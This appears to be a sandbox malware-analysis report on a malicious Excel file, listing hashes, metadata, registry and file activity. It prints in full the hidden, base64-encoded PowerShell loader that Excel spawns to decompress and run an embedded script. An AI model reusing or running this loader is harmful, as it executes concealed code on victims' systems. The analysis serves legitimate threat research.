File name: | 1c067c8a7061b9c2e643f492f7ffce8493d30fc7c401fc5d6cb4576fe3ec4ca6.xlsb |
Full analysis: | https://app.any.run/tasks/e0a48fb0-cdc9-4160-987a-1a81a0d2816a |
Verdict: | Malicious activity |
Analysis date: | March 15, 2019, 02:08:30 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.spreadsheetml.sheet |
File info: | Microsoft Excel 2007+ |
MD5: | E1EC3668D8C44EC261D334BC212F48A5 |
SHA1: | B98664F7298711768A2778541DC5B2E3E6C274CB |
SHA256: | 1C067C8A7061B9C2E643F492F7FFCE8493D30FC7C401FC5D6CB4576FE3EC4CA6 |
SSDEEP: | 768:MSEOiC32NVRAtpZvv9FonHskiiZ3UX1Hy:MSTiCeMt7vv9FuiidUXg |
.zip | | | Open Packaging Conventions container (81.3) |
---|---|---|
.zip | | | ZIP compressed archive (18.6) |
AppVersion: | 15.03 |
---|---|
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
Company: | - |
TitlesOfParts: | Sheet1 |
HeadingPairs: |
|
ScaleCrop: | No |
DocSecurity: | None |
Application: | Microsoft Excel |
ModifyDate: | 2019:03:14 19:35:42Z |
CreateDate: | 2019:03:14 19:27:20Z |
LastModifiedBy: | Windows User |
Creator: | Windows User |
---|
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 1118 |
ZipCompressedSize: | 388 |
ZipCRC: | 0xd4064205 |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2852 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
2920 | powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAmACgAWwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQA6ADoAYwByAGUAYQB0AGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBCADIASABpAGwAdwBDAEEANwBWAFcAZQAyACsAYgBTAEIARAAvAHUANQBIAHkASABWAEIAbAB5AGEAQQA0AEIAcQBkAHUAbQBvAHQAVQA2AFEARABqAEcATgBlAGsASgB0AGoANABWAGEAdgBhAHcAQgBvADIAWABoADYARgBKAFQAYgBwADkAYgB2AGYAcgBJADMAVABWAEUAMwB1ADIAcABNAE8ASQBiAEUANwBPADgALwBmAHoATwB5AHcASwBtAEsAUABrAFMAUQBXAHkAdgB2AFcAUgBQAGgANgBmAFAAUgBxAGkARABJAFUAQwBXAEsAdABaAEEAMgBoAGwAdQBuAFMAcQAxAGQAQQByAEkAVwBmAGgAZgBlAEMAdQBGAEQAVAB0AEoATgBFAGkATQBUAEwAeQAwAHUAOQB5AEQASQBjAHMALwAyACsAZQBZAFcAWgBtAHUAYwA0AHUAcQBVAEUANQA2AEkAawAvAEMAVgBNAFEAcAB6AGgAMAA0ACsAMwBkADkAaABqAHcAbABlAGgAOQByAGwANQBSAFoATgBiAFIAQwB1ADIAVQBrAGQAZQBpAEkAVgBUAE4AZgBiADUAMgBTAEQAeABFAEgAZQBrADYAYQBTAFUATQBMAEgAKwA2AFYATgBkAFcAcAB5ADIAbABrADMAagBTADQARgBvAEwAdABhAGQATQBtAGMANABhAHYAcQBVADEAaQBYAGgAbQA4AFEATgBqAHMAbwBVAGkAMwBXAEwAZQBGAG0AUwBKAHkAdgBXAG4ASgBEADQAegBWAGwAegBIAE8AZABvAGgAYQA5AEIAMgB6ADIAMgBNAEEAcwBUAFAANgA5AEwARQBBAE8AOABHAFcAWgBGAEYAZwBzAFEARABSAGYAZgBIADQAcAAxAFcAQQA2AHoAeABGAE4AOQBQADgATgA1AFgAbQA4AEkAQwA2ADUANABzAFYAegArAEsAUwA0AHEAcQB6AGQARgB6AEUAaQBFAG0AMgBiAE0AYwBKAGEAawBEAHMANwB1AGkAWQBmAHoAWgBnAC8ARgBQAHMAVQAzAGUATABVAEUASwBZAGQAbABKAEEANgBXAGsAZwBSAHMAOQA4AGsAYQBpADcAVwA0AG8ATABRAGgALwBJADQAYQA4AFIAcAB2AEQAcABqADkAcQBwAEQANABWAEEAaQA0AGgAaQB5AFQARwBwAEQAQgBuADYASwAwAEUAcgArAGcAZQBDADkAWABmADgAWgBOAHkATABrAEUAegB6ADcAdgBBAE4AbQAzADQANgBQAGoAbwA5AFcAaABRAHIAeQBKADAAawBKAFAAUwB3AFIAVwByAHgAYQA3AE4AUQBiAFAAeABHAEcAUwBrAHgAMwBqAGUAMABGAHAAQwBCAFoAWQBRAFMAegBKAFMAdABqAFcAUgBsAG0AQgBwAGUAVQBqAHIAawBJAHQAOABsAGoAagBaAGYASABXAGcAWgBkAHoAVQBpAEEAcwAzAEkAVAA0AFMAeABDAG8AOABsAGgATABHAEsAZQArAFgASQAwAGQAdgBDAEkAeAA3AHAAUQB4AGkAbwBoADMASwBEAGoAeABPAFgARAB4AGkAdQBKAGQAZgBNADAARAAyAHoAVQA0AEoATgBhAHIAQQArAHgAMwBNAE0AVQBCAFkAaAB3AHcAbgB1AE8AZgB4AEkAeQBJAHMARQBkAFoAcgBTAEQAVQB4ADUAbgBxAFEAWQBKAHkAOABBAHAAeQBKAC8AMwBvAHoARAA0AEgAWQB0ADIATQBMAFIAdwBCAFAAUABzADkARgBGADEAdABCAFcAVwBPAEQAOQB4AFYAYQBaAGMASAA2ADMAdwBQAFQASABXAGQAbwBqAHgAdgBDAE0ATQBDACsAcwB4AHIAQwBBADUARwBGAFAAcwBOAFEAWQAxAHoAVQBoADIAcABCAFUAdAAyAHkALwBwADMAZAA2ADIAQwBNAHUASwBoAG4AQgAzAFUATABhAFUAOQBpAHAAVQAxAFAAWQBsAHoAbABoAFUAZQA1AEEAcwBpAEgAegBrAHAAOQBnAGkAaQBIAEkAaQBHADAAQwBNACsAMQBrAHEASABCAEEAZQByADkAVwBkAGgAMABCAEcAbABVAFAAMgBnADYAUgA3AFMAQQBCAFEAZQB2AHMATgA0AEYAVwBUAGcASQBNACsANAAxAEgAUQB3AE0ANgBPAFUANABnAGgAWQBkAHQAMwBlAHAAUwBpAEEAMwBxADUASwBmAEYAYwAxAEsATQBCACsALwBVAGYAMwBEAGkAVwA4AHIAMQBjAE8AdwB5AEgAKwBKADgANQBCAGIAaAAyAGEAdwBLAFgAbABrAG8AegBCAGwAYwBFAGgAagBlAGgALwBzAHYAegBrAHAAZwBBAGYAOQBBAHgAWABDAFIAQQBQAFAAYgBIAFEAUwBzAFkATAB1AGIAWQBkAFQAMwBrAGgAVgBuAEQAcwBnAHMAOABZAEIATgA3AE4AawBrAGgARABPAFQANQB2ADcAeQA4AEYAOABiAFYAcwBrAE0ANwBiAFkAUwBkADUAVQBPAEUAeAB1AGoAZQAyAHEAegBsAGoAZAAyADUAYQBmAHAAOAA2AEoAbgBOAG0AQgBoAG0ATQB3ADkAQQBrAEwAVABPAEEAZgBUAGsAMgBnAGkARgBUADAAZwArAGoAVQBhAC8AdgBkAEgAcABxADEAdABtAEcASwA5AFgATQBUAGEATwBuAGwAWABaAEwAVQA3ADAAZQBlAGUAZgAyAHQAZgBFAFkANQBJAGcAKwBzAE8AKwAyAHAAdQBwAHIAVQBUAEEATgBaAHYAcgBHAEgASQBaAFQARQB3AHoAcABnADgAQQBNADQASwB1AFoAbwBhAGMAcABjAHkAWABRAGwASwA0ACsAYwBMAFQAUQBJAEkAbwBhAE8ASABiAFAAYgByAGYAbQBwAG4AeABCAE4AZgBMAGcAbQBJADcAYQBtAHoAegBhAGUANwBSAGoAdABOAHUAOQA2AFgAYQBrAFgAbAB0ADkATgBlAHgAKwA5AEwAdQB0AHMAKwA1AE8AZgBzADMAbAA1ACsAdQByAFEAYwBmAFkANwBUADIAKwB0ADIAZQA1AFEAUQB5AHcAWQAzAFIAbgB0AGgAdgBpAGkAWgB0AHEARQA2AE0ANwB0ADkAMwBVAEQARQA0ADIAZwBlADAATwA1AEgAWQAzADEASQBCAHUAawB1ADAAZwBkAFcAUgA0AFcAcQAzACsAZgBlAHcALwBXAFAAVABpAHcAUQBKADMAYgBYAGYAZQBKADMAaAB1AEIAcgBnAE0AVgBGAHQAVgBuAFYAbABNAG4AZAB1AE4AcgB1AHEAZABkADUAcwBQAGQAMQArAG8AMABSADAARABiAFQAMAB5ADQANgAxADkAbQAxAHAAKwBPAGUAdgBKAGYANwBnAFcAdwBXAG0AaQAyAG8AYQBxAGQAaQBrADAAWQBxAFMAaQBUAFUAZAB1AFQAWgBJAFAAdAB2AHYAVwBIAGgAdgBLAHQAaAB3AHIAMgA0ADEAeABKADIAOABNADAAdAArAHMAcQArAC8ANAA2AHYAdwA4AGsARgBmAHQAbwBlAHcANgBaAHQAeABEAG8AUQBiACsAbAB2ADMAMgBtAHYAUgBQADQAQwB4AEMAcgBqAEoAYgB5AFMANwBIAFQAMQAvAEgAOABrAE0AOABwAGUAZAA5AGEANABjAHAAeABHAE8ARABEAE8ARwBZAG8AZQBBAEcANQBQAFkAeQBLAG8AdgBOAHEAUwB5ADcAZwBSAHkAbwBLACsAcQBhAHcAWQBVAGQAVABKAFAANABEAEsAMQBCADkAeQBSAFEAdwBVAE8ASQBFAFgASwA5ADYAcAB1AFcAQgA3ADUAUwBzAGgANgBmAFQATwBYAFcARwBQAHgAUgBvAHYANQBXADQAYgA1AEcALwBRAHYAUQBkADcAWgArAFIAcQBjAFQAQQByAGIAKwBIAEsAawBhADkAMABPAGIAWABDAFgAcQBaAEgAMQAxAHIAcABjAFgAUQB3AHYAaQBjAEYAdQBnAE0AMwBhAEwAMABhAFEASABPAHMASABuAFkAbgAzAEIAWQBZAGIAOABkAGgAdwA5AHYAbgBMAE0ANgBaAGwALwBlADYAUABKAEoALwA0AE0AQgBkAHIAYwA4AFYAYgA2AHgAVwBCAEMAMwBIAHYAWgBmAGMAMABiAEEARABxAGcAbABxACsAZgBWAFAAWgBMAE0AOABoAEMAVwBSADQAaQBDAGgAVQBQADQAKwBWAHcAdQBYAFMAVAByAEYAcwBOAGoAVwBGAEMAdQBJAFEAbwA3AG4ANAB2ADEAagBpAEwATQBZAFUAUgBEAFUAUAA4ADAASwBZAHEAcABZAG4ASAB4ADkAVgArAHYATQBDAHMAMwBFADgAdwBQAGwARABIAHMASAB4AHoAOQB1AHgASwBFAGgANABaAHAAZQArAFQANwBFAEMANgB2AEoAeQBEAG0AOQBEADcAMABKAC8ATgBBAFkANABEAEYAagBhAFUANwBSAHQARgBnAGMARwBrAGIATgBzAEsAeABQAGoAcgBrAGUAbABKAFcAbwBwAGMAVQA0AFAAUABOAGMAQwBsADAAawB0ADMAZQBpAFYAKwBIADkAUgB1AFUANAAyAEYALwB5ADkAZQAxAFQAVQBVAHcAcwBmAC8AVgA3AHkAKwAwAC8ANwBoADkASgBjAHcAVgBCAG8AOAA0AHAAKwBJAFAAeABKACsAQwA4AC8AZgBqAG4AeQBDAEMAQQBOAE8AQgArADUAUgBpAHYAZgBqACsAdwBVAEEAcQB0AHAANAA4AG0AdQB6AFMAdwB6AGsAZgBsAFUAOQAvAE0AZgAwAFkAOABGAE8AcgArAEcAWAA1AC8AagBvAGIALwBpAFUAdQBlAEgAKwBDAGcAQQBBACcAJwApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (2852) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Operation: | write | Name: | 9a$ |
Value: 39612400240B0000010000000000000000000000 | |||
(PID) Process: | (2852) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (2852) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (2852) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel |
Operation: | write | Name: | MTTT |
Value: 240B00003A00DD0DD4DAD40100000000 | |||
(PID) Process: | (2852) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Operation: | delete value | Name: | 9a$ |
Value: 39612400240B0000010000000000000000000000 | |||
(PID) Process: | (2852) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Operation: | delete key | Name: | |
Value: | |||
(PID) Process: | (2852) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency |
Operation: | delete key | Name: | |
Value: | |||
(PID) Process: | (2852) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
(PID) Process: | (2852) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 1 | |||
(PID) Process: | (2852) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\199FA2 |
Operation: | write | Name: | 199FA2 |
Value: 04000000240B00006700000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0031006300300036003700630038006100370030003600310062003900630032006500360034003300660034003900320066003700660066006300650038003400390033006400330030006600630037006300340030003100660063003500640036006300620034003500370036006600650033006500630034006300610036002E0078006C0073006200000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C000100000000000000906C8C0FD4DAD401A29F1900A29F190000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2852 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR9919.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2920 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O0CX80X7TG578G2L0GGM.temp | — | |
MD5:— | SHA256:— | |||
2920 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19a464.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2920 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 |